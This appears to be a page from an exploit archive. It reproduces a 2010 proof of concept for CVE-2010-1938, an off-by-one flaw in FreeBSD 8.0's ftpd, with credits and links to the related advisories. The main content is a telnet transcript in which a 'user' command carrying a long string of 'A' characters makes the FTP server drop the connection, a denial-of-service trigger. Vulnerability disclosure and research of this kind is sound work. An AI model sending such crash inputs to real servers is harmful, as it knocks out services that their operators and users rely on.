Skip to content
cyberexploits
dosfreebsdtext

FreeBSD 8.0 ftpd (FreeBSD-SA-10:05) - Off-By-One (PoC)

FreeBSD 8.0 ftpd (FreeBSD-SA-10:05) - Off-By-One (PoC)

Published on 2010-05-27

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/freebsd/dos/12762.txt7eac4c3a
raw
# FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)

# CVE-2010-1938

# FreeBSD-SA-10:05

# Credit: Maksymilian Arciemowicz and Adam Zabrocki

#

# http://securityreason.com/achievement_securityalert/87

# http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc

# http://blog.pi3.com.pl/?p=111

#



PoC:

Connected to localhost.

Escape character is '^]'.

220 127.cx FTP server (Version 6.00LS) ready.

user cx

331 Password required for cx.

user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Connection closed by foreign host.



- -- 

Best Regards,

- ------------------------

pub 1024D/A6986BD6 2008-08-22

uid Maksymilian Arciemowicz (cxib)

<cxib@securityreason.com>

sub 4096g/0889FA9A 2008-08-22



http://securityreason.com

http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
View on GitHub